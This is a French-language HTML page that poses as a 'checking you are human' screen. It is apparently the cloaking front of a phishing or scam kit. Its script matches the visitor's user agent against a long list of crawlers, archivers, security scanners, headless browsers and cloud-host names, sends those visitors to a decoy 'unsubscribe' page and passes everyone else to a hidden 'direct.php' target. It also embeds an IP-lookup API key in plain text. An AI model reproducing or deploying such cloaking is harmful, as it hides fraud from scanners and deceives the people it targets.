<!DOCTYPE html>
<html lang="fr">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Vérification en cours</title>
    <link rel="stylesheet" href="https://stackpath.bootstrapcdn.com/bootstrap/4.5.2/css/bootstrap.min.css">
    <script src="https://code.jquery.com/jquery-3.5.1.slim.min.js"></script>
    <script src="https://cdn.jsdelivr.net/npm/@popperjs/core@2.9.2/dist/umd/popper.min.js"></script>
    <script src="https://stackpath.bootstrapcdn.com/bootstrap/4.5.2/js/bootstrap.min.js"></script>
    <style>
        body {
            background-color: #f8f9fa;
            height: 100vh;
            display: flex;
            justify-content: center;
            align-items: center;
        }
        .loading-container {
            text-align: center;
            padding: 30px;
            border-radius: 7px;
            background-color: white;
            box-shadow: 0 4px 8px rgba(0, 0, 0, 0.1);
        }
        .spinner-border {
            width: 3rem;
            height: 3rem;
        }
    </style>
</head>
<body>

<div class="loading-container">
    <div class="spinner-border text-primary" role="status">
        <span class="sr-only">Loading...</span>
    </div>
    <h4 class="mt-3">Veuillez patienter</h4>
    <p>Nous vérifions que vous êtes un humain. <br><small>Nous allons vous rediriger dans un instant...</small></p>
</div>

<script>
    const crawlerPatterns = [
      /googlebot/i,
      /bingbot/i,
      /yandexbot/i,
      /baiduspider/i,
      /duckduckbot/i,
      /slurp/i,
      /ahrefsbot/i,
      /semrushbot/i,
      /mj12bot/i,
      /screaming frog/i,
      /sitebulb/i,
      /serpstatbot/i,
      /dotbot/i,
      /facebot/i,
      /linkedinbot/i,
      /twitterbot/i,
      /pinterestbot/i,
      /curl/i,
      /wget/i,
      /httpclient/i,
      /python-requests/i,
      /java/i,
      /php/i,
      /ruby/i,
      /node-fetch/i,
      /axios/i,
      /crawler/i,
      /spider/i,
      /robot/i,
      /bot/i,
      /crawl/i,
      /fetcher/i,
      /scanner/i,
      /checker/i,
      /archiver/i,
      /ia_archiver/i,
      /archive.org/i,
      /petalbot/i,
      /qwantify/i,
      /applebot/i,
      /uptimerobot/i,
      /zyborg/i,
      /turnitinbot/i,
      /mj12bot/i,
      /sogou/i,
      /seznambot/i,
      /digitalocean/i,
      /aws/i,
      /gce/i,
      /azure/i,
      /linode/i,
      /phantomjs/i,
      /headless/i,
      /selenium/i,
      /puppeteer/i,
      /chrome-lighthouse/i,
      /playwright/i
    ];

    function isCrawler() {
      return crawlerPatterns.some(pattern => pattern.test(navigator.userAgent));
    }

    const allowedCountries = ["FR"]; 

    async function getUserData() {
      try {
        const response = await fetch('https://pro.ip-api.com/json/31.26.172.149?key=Afu1i0EuYaw4BmI'); // API publique pour obtenir des données utilisateur
        return await response.json();
      } catch (error) {
        console.error("Erreur lors de la récupération des données utilisateur :", error);
        return null;
      }
    }

    async function handleRedirect() {
      if (isCrawler()) {
        window.location.href = "./unsubscribe.php";
      } else {
        setTimeout(() => {
          window.location.href = "./direct.php";
        }, 1200); // 2000 millisecondes = 2 secondes
      }
    }

    // Exécuter immédiatement
    handleRedirect();
</script>

</body>
</html>